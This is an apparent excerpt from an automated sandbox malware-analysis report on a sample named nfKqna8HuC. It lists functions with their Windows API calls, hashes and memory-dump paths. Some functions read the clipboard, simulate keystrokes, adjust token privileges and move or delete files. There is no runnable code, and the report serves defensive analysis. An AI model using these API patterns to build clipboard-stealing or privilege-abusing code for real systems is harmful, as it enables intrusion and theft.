Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
Instruction ID: fbbde4b10966f8ddae851db0b5304c4a40b91902e2affe9e851817914dfd3e70
Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
Instruction Fuzzy Hash: 7B01863140051AEECF44EF64D8918FEBB7AAF10304F008029B55197195EB309B49DF64

Function 00642AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00642AED

Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: f71793428127870d021e9e84b789fe4d6604de324e674c441479613a30224a00
Instruction ID: 1c38f243bcf672dea466b017e9c2b3f86f182520ccf85f3a6817ab76fbbaad28
Opcode Fuzzy Hash: f71793428127870d021e9e84b789fe4d6604de324e674c441479613a30224a00
Instruction Fuzzy Hash: 9AF0F631940206EBDF71AF75CC063DF3AA3BF01310F658419F8109B291C7788AA2DB55

Function 00624252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,006239FE,?,00000001), ref: 00624286

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: c7df2fccb63f4f035647dac9003fd0d7925571e34e036e43570f18127e32ee08
Instruction ID: 87edab9e3c262d747a51e85f089f295aec9790f6bb1b57393b3f63ef97cc97ac
Opcode Fuzzy Hash: c7df2fccb63f4f035647dac9003fd0d7925571e34e036e43570f18127e32ee08
Instruction Fuzzy Hash: 8CF0307150AB22CFCB349F66E490856B7E6FF043153248A3EF1D686610CB719A40DF50

Function 006240A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006240C6

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 6016a02ea0bb43f2769d8badc10635cc9c5b9d31301a457e121af91e3b5ef4ed
Instruction ID: 689ec7239aff1933ab28eaea54156232ee64ca795afbeacac777ca709086e954
Opcode Fuzzy Hash: 6016a02ea0bb43f2769d8badc10635cc9c5b9d31301a457e121af91e3b5ef4ed
Instruction Fuzzy Hash: DAE0C236A002245BCB11A758DC46FEA77AEDF8C6A0F0900B9F909E7244DA74AD818A94

Function 0066BCF4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0066BD16

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
Instruction ID: dbfb885207e9341801d43e33528bdd40848afbb6db2fff8cde88908cad7af98f
Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
Instruction Fuzzy Hash: 2CE092B0104B009FDB348A24D800BE377E1EF05305F00081CF2AAC7341EB6278818659

Function 014DEC1C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 014DEC31

Memory Dump Source

Source File: 00000000.00000002.2063884765.00000000014DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14dc000_nfKqna8HuC.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: c05ec30d72b0c7e7cff79b57c166a4ce8fad566895e8418a3d00c4430bfcff17
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: F5E0BF7494010DEFDB00EFA4D6496EE7BB4EF04702F1005A1FD05E7691DB309E548A62

Function 014DEC20 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 014DEC31

Memory Dump Source

Source File: 00000000.00000002.2063884765.00000000014DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14dc000_nfKqna8HuC.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 0c57fd9a208ccf9f9200744af102d2165109c6ca4423f5098dfd7e348a6068e7
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 9DE0E67494010DDFDB00EFB4D6496AE7FB4EF04702F100161FD01E2291D6309D508A62

Non-executed Functions

Function 0068F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0063B34E: GetWindowLongW.USER32(?,000000EB), ref: 0063B35F

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0068F87D
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0068F8DC
GetWindowLongW.USER32(?,000000F0), ref: 0068F919
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0068F940
SendMessageW.USER32 ref: 0068F966
_wcsncpy.LIBCMT ref: 0068F9D2
GetKeyState.USER32(00000011), ref: 0068F9F3
GetKeyState.USER32(00000009), ref: 0068FA00
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0068FA16
GetKeyState.USER32(00000010), ref: 0068FA20
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0068FA4F
SendMessageW.USER32 ref: 0068FA72
SendMessageW.USER32(?,00001030,?,0068E059), ref: 0068FB6F
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0068FB85
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0068FB96
SetCapture.USER32(?), ref: 0068FB9F
ClientToScreen.USER32(?,?), ref: 0068FC03
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0068FC0F
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0068FC29
ReleaseCapture.USER32 ref: 0068FC34
GetCursorPos.USER32(?), ref: 0068FC69
ScreenToClient.USER32(?,?), ref: 0068FC76
SendMessageW.USER32(?,00001012,00000000,?), ref: 0068FCD8
SendMessageW.USER32 ref: 0068FD02
SendMessageW.USER32(?,00001111,00000000,?), ref: 0068FD41
SendMessageW.USER32 ref: 0068FD6C
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0068FD84
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0068FD8F
GetCursorPos.USER32(?), ref: 0068FDB0
ScreenToClient.USER32(?,?), ref: 0068FDBD
GetParent.USER32(?), ref: 0068FDD9
SendMessageW.USER32(?,00001012,00000000,?), ref: 0068FE3F
SendMessageW.USER32 ref: 0068FE6F
ClientToScreen.USER32(?,?), ref: 0068FEC5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0068FEF1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0068FF19
SendMessageW.USER32 ref: 0068FF3C
ClientToScreen.USER32(?,?), ref: 0068FF86
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0068FFB6
GetWindowLongW.USER32(?,000000F0), ref: 0069004B

Strings

@GUI_DRAGID, xrefs: 0068FBCC
F, xrefs: 0068FF42

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 2516578528-4164748364
Opcode ID: df835258f219fe08c573b56af3f0f6db22e7825860d17b4bcdb11fa7292ef411
Instruction ID: eef0b5c60282ebd7ec2b63587baa31c034c27bfd0e770e016ce0e54b07a76bf2
Opcode Fuzzy Hash: df835258f219fe08c573b56af3f0f6db22e7825860d17b4bcdb11fa7292ef411
Instruction Fuzzy Hash: 2532ADB4604345EFDB10EF64C884BAABBBAFF4A354F140629F6558B2A1C731EC51CB51

Function 0068AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0068B1CD

Strings

%d/%02d/%02d, xrefs: 0068AEFC

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: e782ed754ecccd542227b2966efb06cb056ad4e3a8d677d795cf33c9656ac487
Instruction ID: 562a7f8307d7a36f29a6ce42968aa45be3cea356db253d323391df9b570c0f7b
Opcode Fuzzy Hash: e782ed754ecccd542227b2966efb06cb056ad4e3a8d677d795cf33c9656ac487
Instruction Fuzzy Hash: 4B12E171500218ABEB24AF64DC49FAE7BBAFF45310F14521AFA1ADB2D1DB709902CF51

Function 0063EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 0063EB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00693AEA
IsIconic.USER32(000000FF), ref: 00693AF3
ShowWindow.USER32(000000FF,00000009), ref: 00693B00
SetForegroundWindow.USER32(000000FF), ref: 00693B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00693B20
GetCurrentThreadId.KERNEL32 ref: 00693B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00693B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00693B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00693B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 00693B54
SetForegroundWindow.USER32(000000FF), ref: 00693B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 00693B6C
keybd_event.USER32(00000012,00000000), ref: 00693B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 00693B81
keybd_event.USER32(00000012,00000000), ref: 00693B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 00693B8F
keybd_event.USER32(00000012,00000000), ref: 00693B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 00693B9E
keybd_event.USER32(00000012,00000000), ref: 00693BA3
SetForegroundWindow.USER32(000000FF), ref: 00693BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 00693BCD

Strings

Shell_TrayWnd, xrefs: 00693AE5

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 3c219c91b6a1c312e6891bca0e866f3e060172f7e25366550b4a110a8d983217
Instruction ID: 0b17f23e219b7f259cecb7390ebc989e28592b401ecd3bc521fbf29d3d5c6dcf
Opcode Fuzzy Hash: 3c219c91b6a1c312e6891bca0e866f3e060172f7e25366550b4a110a8d983217
Instruction Fuzzy Hash: 3B31A971A403287BEF306F658C49FBF7E6EEB45B50F104015FA05EA6D0D6B16D01AEA0

Function 0065ACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 0065B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0065B180
Part of subcall function 0065B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0065B1AD
Part of subcall function 0065B134: GetLastError.KERNEL32 ref: 0065B1BA

_memset.LIBCMT ref: 0065AD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0065AD5A
CloseHandle.KERNEL32(?), ref: 0065AD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0065AD82
GetProcessWindowStation.USER32 ref: 0065AD9B
SetProcessWindowStation.USER32(00000000), ref: 0065ADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0065ADBF

Part of subcall function 0065AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0065ACC0), ref: 0065AB99
Part of subcall function 0065AB84: CloseHandle.KERNEL32(?,?,0065ACC0), ref: 0065ABAB

Strings

default, xrefs: 0065ADBA
H*m, xrefs: 0065AE40
winsta0, xrefs: 0065AD7D
, xrefs: 0065AD17

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $H*m$default$winsta0
API String ID: 2063423040-848939072
Opcode ID: 0f9012715e16bb67805a9c26b96a13910a402d6693309811a4d00d34dc450a28
Instruction ID: 47ee46d0f136b62735a8c808eb0e45dddf2c9202384a5a2296eab53bdda7b172
Opcode Fuzzy Hash: 0f9012715e16bb67805a9c26b96a13910a402d6693309811a4d00d34dc450a28
Instruction Fuzzy Hash: D081ADB1800209AFDF119FE4DC45AEEBBBAFF09305F044219FD15A6261D7319E49DB62

Function 006660DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00666EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00665FA6,?), ref: 00666ED8

Part of subcall function 00666EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00665FA6,?), ref: 00666EF1

Part of subcall function 0066725E: __wsplitpath.LIBCMT ref: 0066727B
Part of subcall function 0066725E: __wsplitpath.LIBCMT ref: 0066728E

Part of subcall function 006672CB: GetFileAttributesW.KERNEL32(?,00666019), ref: 006672CC

_wcscat.LIBCMT ref: 00666149
_wcscat.LIBCMT ref: 00666167
__wsplitpath.LIBCMT ref: 0066618E
FindFirstFileW.KERNEL32(?,?), ref: 006661A4
_wcscpy.LIBCMT ref: 00666209
_wcscat.LIBCMT ref: 0066621C
_wcscat.LIBCMT ref: 0066622F
lstrcmpiW.KERNEL32(?,?), ref: 0066625D
DeleteFileW.KERNEL32(?), ref: 0066626E
MoveFileW.KERNEL32(?,?), ref: 00666289
MoveFileW.KERNEL32(?,?), ref: 00666298
CopyFileW.KERNEL32(?,?,00000000), ref: 006662AD
DeleteFileW.KERNEL32(?), ref: 006662BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 006662E1
FindClose.KERNEL32(00000000), ref: 006662FD
FindClose.KERNEL32(00000000), ref: 0066630B

Strings

\*.*, xrefs: 00666138, 00666147, 00666165

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*
API String ID: 1917200108-1173974218
Opcode ID: 9f384f1c8335081c0a7e95c6b026b734f254b3b03e7dd492b1a54febd53e4a6b
Instruction ID: 6b92704d8e8d59379f2eab640e4b6c624c37e679ac92d6c53bd88551250da90a
Opcode Fuzzy Hash: 9f384f1c8335081c0a7e95c6b026b734f254b3b03e7dd492b1a54febd53e4a6b
Instruction Fuzzy Hash: B551017290811CAACB21EB95DC55DDBB7BEAF05300F0501EAF545E2141DE36AB89CFA8

Function 00676B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(006BDC00), ref: 00676B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 00676B44
GetClipboardData.USER32(0000000D), ref: 00676B4C
CloseClipboard.USER32 ref: 00676B58
GlobalLock.KERNEL32(00000000), ref: 00676B74
CloseClipboard.USER32 ref: 00676B7E
GlobalUnlock.KERNEL32(00000000), ref: 00676B93
IsClipboardFormatAvailable.USER32(00000001), ref: 00676BA0
GetClipboardData.USER32(00000001), ref: 00676BA8
GlobalLock.KERNEL32(00000000), ref: 00676BB5
GlobalUnlock.KERNEL32(00000000), ref: 00676BE9
CloseClipboard.USER32 ref: 00676CF6

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 8dc59a3881aa3fe2c5fa8b79bb8747b325bf7c927ce014ff8f1ad6b566c4e925
Instruction ID: cdd22000a46f8f7569e8eb081f3eade0260b2b403f4fc936f03598831ae5155e
Opcode Fuzzy Hash: 8dc59a3881aa3fe2c5fa8b79bb8747b325bf7c927ce014ff8f1ad6b566c4e925
Instruction Fuzzy Hash: A251BF31244601ABD301BF60DD46FAE77AAAF85B11F00902DF68AD62E1DF70E905CF66

Function 0066F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0066F62B
FindClose.KERNEL32(00000000), ref: 0066F67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0066F6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0066F6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 0066F6E2
__swprintf.LIBCMT ref: 0066F72E
__swprintf.LIBCMT ref: 0066F767
__swprintf.LIBCMT ref: 0066F7BB

Part of subcall function 0064172B: __woutput_l.LIBCMT ref: 00641784

__swprintf.LIBCMT ref: 0066F809
__swprintf.LIBCMT ref: 0066F858
__swprintf.LIBCMT ref: 0066F8A7
__swprintf.LIBCMT ref: 0066F8F6

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0066F728
%02d, xrefs: 0066F7B0, 0066F7B9, 0066F807, 0066F856, 0066F8A5, 0066F8F4
%4d, xrefs: 0066F761

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: ec81fd8aa6655a98f066f62fb13cf672102ddbea32881688e7ee18a88896282b
Instruction ID: fda37c8db11b0e5bf26fdbe4dbdcbf79bb2b722e9c235b5a5441a72573d443d1
Opcode Fuzzy Hash: ec81fd8aa6655a98f066f62fb13cf672102ddbea32881688e7ee18a88896282b
Instruction Fuzzy Hash: 4AA13FB2408754ABC350EBA4D895DAFB7EDAF98300F400C2EF585C7191EB34DA49CB66

Function 00671B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00671B50
_wcscmp.LIBCMT ref: 00671B65
_wcscmp.LIBCMT ref: 00671B7C
GetFileAttributesW.KERNEL32(?), ref: 00671B8E
SetFileAttributesW.KERNEL32(?,?), ref: 00671BA8
FindNextFileW.KERNEL32(00000000,?), ref: 00671BC0
FindClose.KERNEL32(00000000), ref: 00671BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 00671BE7
_wcscmp.LIBCMT ref: 00671C0E
_wcscmp.LIBCMT ref: 00671C25
SetCurrentDirectoryW.KERNEL32(?), ref: 00671C37
SetCurrentDirectoryW.KERNEL32(006D39FC), ref: 00671C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 00671C5F
FindClose.KERNEL32(00000000), ref: 00671C6C
FindClose.KERNEL32(00000000), ref: 00671C7C

Strings

*.*, xrefs: 00671BE2

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: f386b888ee91554df3066a50dc9ed2e18009c79a11b31c9cc870326adac80c01
Instruction ID: 4026fa59238d8eef892569abfdfaa3c79f2eaa2ca2dc51e20717e8de12dc8ed7
Opcode Fuzzy Hash: f386b888ee91554df3066a50dc9ed2e18009c79a11b31c9cc870326adac80c01
Instruction Fuzzy Hash: 0031D6315002196BCF15ABF4DC49ADE77AE9F07310F108157F91AE6290EB74DF858E64

Function 00671C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00671CAB
_wcscmp.LIBCMT ref: 00671CC0
_wcscmp.LIBCMT ref: 00671CD7

Part of subcall function 00666BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00666BEF

FindNextFileW.KERNEL32(00000000,?), ref: 00671D06
FindClose.KERNEL32(00000000), ref: 00671D11
